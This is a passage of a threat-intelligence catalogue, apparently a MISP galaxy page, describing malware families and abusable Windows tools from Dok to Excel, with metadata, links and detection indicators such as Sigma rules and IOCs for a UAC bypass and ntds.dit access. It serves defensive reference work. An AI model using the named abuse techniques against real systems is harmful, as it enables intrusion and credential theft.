Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0213 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dok
Dok is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. Adversary-in-the-Middle).[objsee mac malware 2017][hexed osx.dok analysis 2019][CheckPoint Dok]
Internal MISP references
UUID dfa14314-3c64-4a10-9889-0423b884f7aa
which can be used as unique global reference for Dok
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0281 |
source | MITRE |
type | ['malware'] |
Doki
Doki is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. Doki was used in conjunction with the ngrok Mining Botnet in a campaign that targeted Docker servers in cloud platforms. [Intezer Doki July 20]
Internal MISP references
UUID e6160c55-1868-47bd-bec6-7becbf236bbb
which can be used as unique global reference for Doki
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Linux'] |
software_attack_id | S0600 |
source | MITRE |
tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b'] |
type | ['malware'] |
Donut
Donut is an open source framework used to generate position-independent shellcode.[Donut Github][Introducing Donut] Donut generated code has been used by multiple threat actors to inject and load malicious payloads into memory.[NCC Group WastedLocker June 2020]
Internal MISP references
UUID 40d25a38-91f4-4e07-bb97-8866bed8e44f
which can be used as unique global reference for Donut
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0695 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dotnet
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: dotnet.exe comes with .NET Framework
Author: felamos
Paths: * C:\Program Files\dotnet\dotnet.exe
Resources: * https://twitter.com/_felamos/status/1204705548668555264 * https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc * https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ * https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Detection: * Sigma: proc_creation_win_lolbin_dotnet.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: dotnet.exe spawned an unknown process[Dotnet.exe - LOLBAS Project]
Internal MISP references
UUID 1bcd9c93-0944-4671-ab01-cabc5ffe30bf
which can be used as unique global reference for Dotnet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5216 |
source | Tidal Cyber |
tags | ['09c24b93-bf06-4cbb-acb0-d7b9657a41dc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Downdelph
Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015. [ESET Sednit Part 3]
Internal MISP references
UUID f7b64b81-f9e7-46bf-8f63-6d7520da832c
which can be used as unique global reference for Downdelph
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0134 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
down_new
down_new is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 20b796cf-6c90-4928-999e-88107078e15e
which can be used as unique global reference for down_new
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0472 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DownPaper
DownPaper is a backdoor Trojan; its main functionality is to download and run second stage malware. [ClearSky Charming Kitten Dec 2017]
Internal MISP references
UUID fc433c9d-a7fe-4915-8aa0-06b58f288249
which can be used as unique global reference for DownPaper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0186 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DRATzarus
DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[ClearSky Lazarus Aug 2020]
Internal MISP references
UUID c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf
which can be used as unique global reference for DRATzarus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0694 |
source | MITRE |
type | ['malware'] |
Dridex
Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[Dell Dridex Oct 2015][Kaspersky Dridex May 2017][Treasury EvilCorp Dec 2019]
Internal MISP references
UUID e3cd4405-b698-41d9-88e4-fff29e7a19e2
which can be used as unique global reference for Dridex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0384 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DropBook
DropBook is a Python-based backdoor compiled with PyInstaller.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 9c44d3f9-7a7b-4716-9cfa-640b36548ab0
which can be used as unique global reference for DropBook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0547 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Drovorub
Drovorub is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by APT28.[NSA/FBI Drovorub August 2020]
Internal MISP references
UUID bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b
which can be used as unique global reference for Drovorub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0502 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', '1efd43ee-5752-49f2-99fe-e3441f126b00', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
dsdbutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.
Author: Ekitji
Paths: * C:\Windows\System32\dsdbutil.exe * C:\Windows\SysWOW64\dsdbutil.exe
Resources: * https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358 * https://www.netwrix.com/ntds_dit_security_active_directory.html
Detection: * IOC: Event ID 4688 * IOC: dsdbutil.exe process creation * IOC: Event ID 4663 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * IOC: Event ID 4656 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * Analysis: None Provided * Sigma: None Provided * Elastic: None Provided * Splunk: None Provided * BlockRule: None Provided[dsdbutil.exe - LOLBAS Project]
Internal MISP references
UUID 9139c12f-a6d9-4300-8735-9298bc46a0bf
which can be used as unique global reference for dsdbutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5217 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
dsquery
dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [TechNet Dsquery] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.
Internal MISP references
UUID 06402bdc-a4a1-4e4a-bfc4-09f2c159af75
which can be used as unique global reference for dsquery
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0105 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cb3d30b3-8cfc-4202-8615-58a9b8f7f118', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dtrack
Dtrack is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. Dtrack shares similarities with the DarkSeoul campaign, which was attributed to Lazarus Group. [Kaspersky Dtrack][Securelist Dtrack][Dragos WASSONITE][CyberBit Dtrack][ZDNet Dtrack]
Internal MISP references
UUID aa21462d-9653-48eb-a82e-5c93c9db5f7a
which can be used as unique global reference for Dtrack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0567 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dump64
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe
Resources: * https://twitter.com/mrd0x/status/1460597833917251595
Detection: * Sigma: proc_creation_win_lolbin_dump64.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Dump64.exe - LOLBAS Project]
Internal MISP references
UUID 13482336-e22b-48e9-bd49-c6e6fc6612ec
which can be used as unique global reference for Dump64
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5218 |
source | Tidal Cyber |
tags | ['0f09c7f5-ba57-4ef0-a196-e85558804496', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DumpMinitool
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources: * https://twitter.com/mrd0x/status/1511415432888131586
Detection: * Sigma: proc_creation_win_dumpminitool_execution.yml * Sigma: proc_creation_win_dumpminitool_susp_execution.yml * Sigma: proc_creation_win_devinit_lolbin_usage.yml[DumpMinitool.exe - LOLBAS Project]
Internal MISP references
UUID 7f3bf76a-4e6a-45f1-a4bf-400d5a914e52
which can be used as unique global reference for DumpMinitool
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5219 |
source | Tidal Cyber |
tags | ['3b6ad94f-83ce-47bf-b82d-b98358d23434', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Duqu
Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network. [Symantec W32.Duqu]
Internal MISP references
UUID d4a664e5-9819-4f33-8b2b-e6f8e6a64999
which can be used as unique global reference for Duqu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0038 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
DustySky
DustySky is multi-stage malware written in .NET that has been used by Molerats since May 2015. [DustySky] [DustySky2][Kaspersky MoleRATs April 2019]
Internal MISP references
UUID 77506f02-104f-4aac-a4e0-9649bd7efe2e
which can be used as unique global reference for DustySky
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0062 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dxcap
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: Oddvar Moe
Paths: * C:\Windows\System32\dxcap.exe * C:\Windows\SysWOW64\dxcap.exe
Resources: * https://twitter.com/harr0ey/status/992008180904419328
Detection: * Sigma: proc_creation_win_lolbin_susp_dxcap.yml[Dxcap.exe - LOLBAS Project]
Internal MISP references
UUID 9b5039b9-c5f1-4516-88ef-f63966ec2b36
which can be used as unique global reference for Dxcap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5220 |
source | Tidal Cyber |
tags | ['6d065f28-e32d-4e87-b315-c43ebc45532a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dyre
Dyre is a banking Trojan that has been used for financial gain. [Symantec Dyre June 2015][Malwarebytes Dyreza November 2015]
Internal MISP references
UUID 38e012f7-fb3a-4250-a129-92da3a488724
which can be used as unique global reference for Dyre
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0024 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Earthworm
Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".[Elastic Docs Potential Protocol Tunneling via EarthWorm] According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.[U.S. CISA Volt Typhoon May 24 2023]
Internal MISP references
UUID ee14e483-b5ef-4931-9c2a-72046b6555cc
which can be used as unique global reference for Earthworm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5013 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ebury
Ebury is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).[ESET Ebury Feb 2014][BleepingComputer Ebury March 2017][ESET Ebury Oct 2017]
Internal MISP references
UUID 2375465a-e6a9-40ab-b631-a5b04cf5c689
which can be used as unique global reference for Ebury
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0377 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ECCENTRICBANDWAGON
ECCENTRICBANDWAGON is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.[CISA EB Aug 2020]
Internal MISP references
UUID 70f703b3-0e24-4ffe-9772-f0e386ec607f
which can be used as unique global reference for ECCENTRICBANDWAGON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0593 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ecipekac
Ecipekac is a multi-layer loader that has been used by menuPass since at least 2019 including use as a loader for P8RAT, SodaMaster, and FYAnti.[Securelist APT10 March 2021]
Internal MISP references
UUID 6508d3dc-eb22-468c-9122-dcf541caa69c
which can be used as unique global reference for Ecipekac
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0624 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Egregor
Egregor is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between Egregor and Sekhmet ransomware, as well as Maze ransomware.[NHS Digital Egregor Nov 2020][Cyble Egregor Oct 2020][Security Boulevard Egregor Oct 2020]
Internal MISP references
UUID 0e36b62f-a6e2-4406-b3d9-e05204e14a66
which can be used as unique global reference for Egregor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0554 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '0ed7d10c-c65b-4174-9edb-446bf301d250', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
EKANS
EKANS is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. EKANS has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in MegaCortex.[Dragos EKANS][Palo Alto Unit 42 EKANS]
Internal MISP references
UUID cd7821cb-32f3-4d81-a5d1-0cdee94a15c4
which can be used as unique global reference for EKANS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0605 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Elise
Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. [Lotus Blossom Jun 2015][Accenture Dragonfish Jan 2018]
Internal MISP references
UUID fd5efee9-8710-4536-861f-c88d882f4d24
which can be used as unique global reference for Elise
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0081 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ELMER
ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16. [FireEye EPS Awakens Part 2]
Internal MISP references
UUID 6a3ca97e-6dd6-44e5-a5f0-7225099ab474
which can be used as unique global reference for ELMER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0064 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emissary
Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio. [Lotus Blossom Dec 2015]
Internal MISP references
UUID fd95d38d-83f9-4b31-8292-ba2b04275b36
which can be used as unique global reference for Emissary
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0082 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emotet
Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [Trend Micro Banking Malware Jan 2019]
Internal MISP references
UUID c987d255-a351-4736-913f-91e2f28d0654
which can be used as unique global reference for Emotet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0367 |
source | MITRE |
tags | ['71dfe8d1-666f-4e71-8761-d2876078fb3e', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Empire
Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[NCSC Joint Report Public Tools][Github PowerShell Empire][GitHub ATTACK Empire]
Internal MISP references
UUID fea655ac-558f-4dd0-867f-9a5553626207
which can be used as unique global reference for Empire
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0363 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4f05a12d-f497-4081-acb9-9a257ab87886', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
EnvyScout
EnvyScout is a dropper that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 8da6fbf0-a18d-49a0-9235-101300d49d5e
which can be used as unique global reference for EnvyScout
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0634 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Epic
Epic is a backdoor that has been used by Turla. [Kaspersky Turla]
Internal MISP references
UUID a7e71387-b276-413c-a0de-4cf07e39b158
which can be used as unique global reference for Epic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0091 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
esentutl
esentutl is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[Microsoft Esentutl]
Internal MISP references
UUID a7589733-6b04-4215-a4e7-4b62cd4610fa
which can be used as unique global reference for esentutl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0404 |
source | MITRE |
tags | ['ee88899a-2bf0-4b96-bf69-5b686fa463c3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Eventvwr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Displays Windows Event Logs in a GUI window.
Author: Jacob Gajek
Paths: * C:\Windows\System32\eventvwr.exe * C:\Windows\SysWOW64\eventvwr.exe
Resources: * https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ * https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 * https://twitter.com/orange_8361/status/1518970259868626944
Detection: * Sigma: proc_creation_win_uac_bypass_eventvwr.yml * Sigma: registry_set_uac_bypass_eventvwr.yml * Sigma: file_event_win_uac_bypass_eventvwr.yml * Elastic: privilege_escalation_uac_bypass_event_viewer.toml * Splunk: eventvwr_uac_bypass.yml * IOC: eventvwr.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command[Eventvwr.exe - LOLBAS Project]
Internal MISP references
UUID 4c371bd9-c97c-42ab-b913-1e19cd409382
which can be used as unique global reference for Eventvwr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5105 |
source | Tidal Cyber |
tags | ['59d03fb8-0620-468a-951c-069473cb86bc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
EvilBunny
EvilBunny is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.[Cyphort EvilBunny Dec 2014]
Internal MISP references
UUID 300e8176-e7ee-44ef-8d10-dff96502f6c6
which can be used as unique global reference for EvilBunny
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0396 |
source | MITRE |
type | ['malware'] |
EvilGinx
EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".[GitHub evilginx2]
Internal MISP references
UUID 4892c22d-6fd4-4876-8e8a-af968cf61ecc
which can be used as unique global reference for EvilGinx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5078 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
EvilGrab
EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns. [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID e862419c-d6b6-4433-a02a-c1cc98ea6f9e
which can be used as unique global reference for EvilGrab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0152 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
EVILNUM
EVILNUM is fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group Evilnum which has the same name.[ESET EvilNum July 2020][Prevailion EvilNum May 2020]
Internal MISP references
UUID e0eaae6d-5137-4053-bf37-ff90bf5767a9
which can be used as unique global reference for EVILNUM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0568 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Linux
Exaramel for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under Exaramel for Windows.[ESET TeleBots Oct 2018]
Internal MISP references
UUID c773f709-b5fe-4514-9d88-24ceb0dd8063
which can be used as unique global reference for Exaramel for Linux
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0401 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Windows
Exaramel for Windows is a backdoor used for targeting Windows systems. The Linux version is tracked separately under Exaramel for Linux.[ESET TeleBots Oct 2018]
Internal MISP references
UUID 21569dfb-c9f1-468e-903e-348f19dbae1f
which can be used as unique global reference for Exaramel for Windows
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0343 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Excel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe * C:\Program Files\Microsoft Office\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe * C:\Program Files\Microsoft Office\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe * C:\Program Files\Microsoft Office\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_lolbin_office.yml * IOC: Suspicious Office application Internet/network traffic[Excel.exe - LOLBAS Project]
Internal MISP references
UUID 46efd94e-afd2-4536-8525-0619fc56966f
which can be used as unique global reference for Excel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5221 |
source | Tidal Cyber |
